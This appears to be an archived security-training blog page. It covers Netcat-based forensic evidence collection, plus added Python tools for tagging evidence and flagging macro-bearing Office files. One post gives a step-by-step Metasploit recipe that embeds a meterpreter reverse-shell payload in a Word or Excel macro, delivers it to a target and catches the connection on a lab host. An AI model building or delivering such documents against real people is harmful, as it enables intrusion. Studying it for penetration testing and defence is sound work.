Dear All,
As of today, my personal blog has moved to http://flexi-learn.blogspot.com
New posts will follow as soon as possible.
Semi Yulianto's Personal Blog
Dedicated to ICT Security and other related interests
Monday, July 26, 2010
Thursday, June 24, 2010
Covert Analysis II (Forensics)
Collect the System event log from the evidence machine (LON-WEB1) and move it to the examiner machine (CHFI-XP2) over Netcat. Start the listener on CHFI-XP2 first, then send from LON-WEB1.
On LON-WEB1, open the Event Viewer MMC snap-in, select the System log, then choose Action > Save Log File As... and save it under a new name:
Example: C:\Backup\SysEvent-Backup.evt
On CHFI-XP2, start Netcat listening for the file (-w 60 gives up after 60 idle seconds, so the listener does not hang once the sender has finished):
C:\Tools\Netcat>
nc -v -L -p 99 -w 60 > E:\Evidence\SysEvent-Backup.evt
From LON-WEB1, send SysEvent-Backup.evt to CHFI-XP2 (131.107.1.254):
D:\Forensics\Netcat>
nc -v 131.107.1.254 99 < C:\Backup\SysEvent-Backup.evt
Netcat gives no integrity check of its own: hash the file on both machines with the hashing tool in your toolkit and confirm the values match before relying on the copy.
To analyze:
On CHFI-XP2, open Event Viewer, choose Action > Open Log File..., and load E:\Evidence\SysEvent-Backup.evt to view the events.
Overt Analysis (Forensics)
Use mmc on the CHFI-XP2 machine and connect to the evidence machine (LON-WEB1) remotely. This is overt: the connection is authenticated on LON-WEB1 and leaves logon and object-access events in its Security log, so it changes the state of the evidence machine.
Launch the mmc with runas. Use /netonly so the LON-WEB1 administrator credentials are only presented to LON-WEB1 over the network and are not validated on CHFI-XP2, which cannot verify another machine's local account:
C:\>runas /netonly /user:LON-WEB1\administrator "mmc"
Once mmc has launched, add the snap-ins you need (for example Event Viewer or Computer Management) and point each one at LON-WEB1 via "Another computer".
Link:
Forensics Acquisition Utility (FAU)
http://gmgsystemsinc.com/fau/
Covert Analysis I (Forensics)
Collect volatile data from the evidence machine (LON-WEB1) without writing anything to its disk: each command's output is piped through Netcat to a listener on the examiner machine (CHFI-XP2, 131.107.1.254). Run the tools from your own trusted toolkit (here D:\Forensics), never from binaries found on the suspect system.
On CHFI-XP2, launch Netcat in listening mode (-L makes it listen again after each connection closes, so one listener serves the whole series of commands):
C:\Tools\Netcat>nc -v -L -p 99 >> E:\Evidence\MyEvidence.txt
On LON-WEB1, launch Netcat in client mode, one command at a time (-w10 closes the connection after ten seconds without further data, so each client exits once its command has finished). Record the date and time first, then the most volatile data:
D:\Forensics\Netcat>date /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>time /t | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>ipconfig /all | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>netstat -an | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>nbtstat -n | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>arp -a | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>route print | nc 131.107.1.254 99 -w10
D:\Forensics\Netcat>tasklist | nc 131.107.1.254 99 -w10
Display registry values (the Run key, a common persistence location):
D:\Forensics\Netcat>reg query hklm\software\microsoft\windows\currentversion\run | nc 131.107.1.254 99 -w10
The Sysinternals tools live in a different directory. Change into it and call Netcat by its full path:
D:\Forensics>cd SysinternalsSuite
D:\Forensics\SysinternalsSuite>pslist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>psloggedon | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>psloglist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>psservice | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>psfile | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>pipelist | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>listdlls | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
D:\Forensics\SysinternalsSuite>procfeatures | D:\Forensics\Netcat\nc 131.107.1.254 99 -w10
MyEvidence.txt on CHFI-XP2 is the file that stores the evidence collection. Netcat appends the outputs back to back with no separators, so keep a written note of the order in which you ran the commands; expect the netstat output to show your own Netcat connection to 131.107.1.254:99 as well.
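The bare Netcat listener above drops every command's output into MyEvidence.txt with nothing to say which command produced it or whether it arrived intact. The following is an added example written for this page (not the author's code, and not part of the original procedure) of a listener for the CHFI-XP2 side that keeps the LON-WEB1 commands exactly as shown but tags each received connection with a label, a UTC timestamp, the byte count and a SHA-256 digest. The same digest is the integrity check the .evt transfer in Covert Analysis II lacks. It assumes the examiner runs it on CHFI-XP2 with Python available, that port 99 is free, and that MyEvidence.txt is the output file; the loopback self-test sends a constructed sample to itself so the logic can be checked without the lab network.

```python
"""Tagged evidence receiver: a drop-in for `nc -v -L -p 99 >> MyEvidence.txt`.

Each connection (one per command run on LON-WEB1) becomes a record with a
header carrying the command label, UTC timestamp, size and SHA-256, so the
collection file shows what was captured, when, and whether it is intact.
"""
import datetime
import hashlib
import socket
import threading

EVIDENCE_FILE = "MyEvidence.txt"   # assumption: examiner's output file
LISTEN_ADDR = ("0.0.0.0", 99)      # the page's listener port


def format_record(label, payload, timestamp=None):
    """Return (record_text, sha256_hex) for one captured payload."""
    if timestamp is None:
        timestamp = datetime.datetime.now(datetime.timezone.utc).isoformat()
    digest = hashlib.sha256(payload).hexdigest()
    header = (f"=== {label} | {timestamp} | {len(payload)} bytes | "
              f"sha256={digest} ===\n")
    body = payload.decode("utf-8", errors="replace")
    if not body.endswith("\n"):
        body += "\n"
    return header + body, digest


def bind_listener(addr):
    """Open a TCP listener; SO_REUSEADDR lets it restart on the same port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind(addr)
    srv.listen(1)
    return srv


def read_connection(srv, idle_timeout=10.0):
    """Accept one client and read until it closes or goes idle (like nc -w)."""
    conn, peer = srv.accept()
    chunks = []
    with conn:
        conn.settimeout(idle_timeout)
        while True:
            try:
                chunk = conn.recv(65536)
            except socket.timeout:
                break
            if not chunk:          # sender finished and closed
                break
            chunks.append(chunk)
    return b"".join(chunks), peer


def collect(labels, addr=LISTEN_ADDR, path=EVIDENCE_FILE):
    """Receive one connection per label, in order, appending tagged records.

    Returns the list of SHA-256 digests so they can be recorded separately.
    """
    digests = []
    srv = bind_listener(addr)
    with srv, open(path, "a", encoding="utf-8") as out:
        for label in labels:
            payload, peer = read_connection(srv)
            text, digest = format_record(f"{label} from {peer[0]}", payload)
            out.write(text)
            out.flush()
            digests.append(digest)
    return digests


def loopback_selftest(sample):
    """Send constructed `sample` bytes to a local listener; return what arrived."""
    srv = bind_listener(("127.0.0.1", 0))
    port = srv.getsockname()[1]

    def client():
        with socket.create_connection(("127.0.0.1", port)) as c:
            c.sendall(sample)

    sender = threading.Thread(target=client)
    sender.start()
    with srv:
        received, _ = read_connection(srv, idle_timeout=5.0)
    sender.join()
    return received


if __name__ == "__main__":
    # Examiner side: expects the page's commands, sent in this order.
    print(collect(["date /t", "time /t", "ipconfig /all", "netstat -an",
                   "nbtstat -n", "arp -a", "route print", "tasklist"]))
```

Start the script on CHFI-XP2 before running the commands on LON-WEB1; the LON-WEB1 side is unchanged (`date /t | nc 131.107.1.254 99 -w10` and so on). Because the script labels connections by arrival order, send the commands in the order passed to collect().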
Tuesday, May 18, 2010
Client-side Attack by Using Evil MS-Office Apps (Excel or Word)
Step 1: Create your own payload
cd /pentest/exploits/framework3
./msfpayload windows/meterpreter/reverse_tcp LHOST=131.107.1.252 LPORT=443 X > /tmp/payload.exe
Step 2: Convert your newly created payload to a VBA (Visual Basic for Applications) script
cd /pentest/exploits/framework3/tools
./exe2vba.rb /tmp/payload.exe /tmp/payload.vba
Step 3: Copy and paste the contents of the payload into your evil file
Open your evil file (Excel or Word). Select Tools > Macro > Visual Basic Editor and paste the macro section of payload.vba into the document's module (ThisDocument or ThisWorkbook). payload.vba has a second, payload-data section: paste that into the body of the document itself, where the macro reads it back when it runs. Save the file.
Step 4: Deliver the file to the client
Get the document in front of the target (e-mail, file share, download link). The macro runs only when the client opens the file and allows macros to execute.
Step 5: Wait for the reverse connection from the client
Start the handler before the client opens the file, with the same payload, LHOST and LPORT used in Step 1:
msf > use exploit/multi/handler
msf > set PAYLOAD windows/meterpreter/reverse_tcp
msf > set LHOST 131.107.1.252
msf > set LPORT 443
msf > exploit
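The defensive counterpart to the procedure above is a quick triage check for the macro-carrying document before anyone opens it. The following is an added example written for this page (not the author's code and not part of the Metasploit tooling the post uses): it classifies a file as a legacy OLE2 document (the .doc/.xls the Tools > Macro route above produces), an OOXML zip (.docm/.xlsm) or something else, and flags VBA by looking for the UTF-16LE `_VBA_PROJECT` directory-entry name in OLE files and for a `vbaProject.bin` part in OOXML files. It is a heuristic: a file whose macros were removed can keep a leftover entry, and encrypted or otherwise unusual containers are not handled. The sample inputs are constructed in the code and are not real Office files.

```python
"""Triage check for macro-carrying Office documents (heuristic, stdlib only)."""
import io
import sys
import zipfile

OLE_MAGIC = bytes.fromhex("D0CF11E0A1B11AE1")   # OLE2 compound file header
ZIP_MAGIC = b"PK\x03\x04"                        # OOXML is a zip container

# OLE directory entries store stream names as UTF-16LE inside 128-byte
# entries, so the name is contiguous even when the directory is fragmented.
# Office's VBA storage contains a "_VBA_PROJECT" stream (Excel's top-level
# storage is "_VBA_PROJECT_CUR", which this prefix also matches).
OLE_VBA_MARKER = "_VBA_PROJECT".encode("utf-16-le")


def classify(data):
    """Return {'container': ..., 'has_vba': bool, 'evidence': [...]} for raw bytes."""
    if data.startswith(OLE_MAGIC):
        hits = ["_VBA_PROJECT"] if OLE_VBA_MARKER in data else []
        return {"container": "ole", "has_vba": bool(hits), "evidence": hits}
    if data.startswith(ZIP_MAGIC):
        try:
            names = zipfile.ZipFile(io.BytesIO(data)).namelist()
        except zipfile.BadZipFile:
            return {"container": "other", "has_vba": False, "evidence": []}
        hits = [n for n in names if n.lower().endswith("vbaproject.bin")]
        return {"container": "ooxml", "has_vba": bool(hits), "evidence": hits}
    return {"container": "other", "has_vba": False, "evidence": []}


def classify_file(path):
    with open(path, "rb") as fh:
        return classify(fh.read())


# --- constructed samples (not real documents; only the bytes the check
# --- inspects are realistic) ---------------------------------------------

def sample_ole_with_vba():
    """OLE header, one empty sector, then a directory entry named _VBA_PROJECT."""
    entry = OLE_VBA_MARKER.ljust(128, b"\x00")
    return OLE_MAGIC + b"\x00" * 504 + entry


def sample_ole_clean():
    """OLE header followed by a directory entry for a plain WordDocument stream."""
    entry = "WordDocument".encode("utf-16-le").ljust(128, b"\x00")
    return OLE_MAGIC + b"\x00" * 504 + entry


def sample_docm():
    """Minimal zip with the parts a macro-enabled Word file carries."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as z:
        z.writestr("[Content_Types].xml", "<Types/>")
        z.writestr("word/document.xml", "<w:document/>")
        z.writestr("word/vbaProject.bin", b"constructed placeholder")
    return buf.getvalue()


if __name__ == "__main__":
    for p in sys.argv[1:]:
        print(p, classify_file(p))
```

Run it as `python triage.py suspicious.doc suspicious.xlsm`; anything reported with has_vba True deserves a look in an isolated analysis VM before it reaches a user, and a has_vba False result on a file that should have no macros is not proof of safety.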
Friday, May 14, 2010
ECSA/LPT @ ECDC Photos
Guys, download our photos from here:
http://www.4shared.com/account/photo/pefTq93p/DSCN1014.html
http://www.4shared.com/account/photo/_AmTe_3S/DSCN1015.html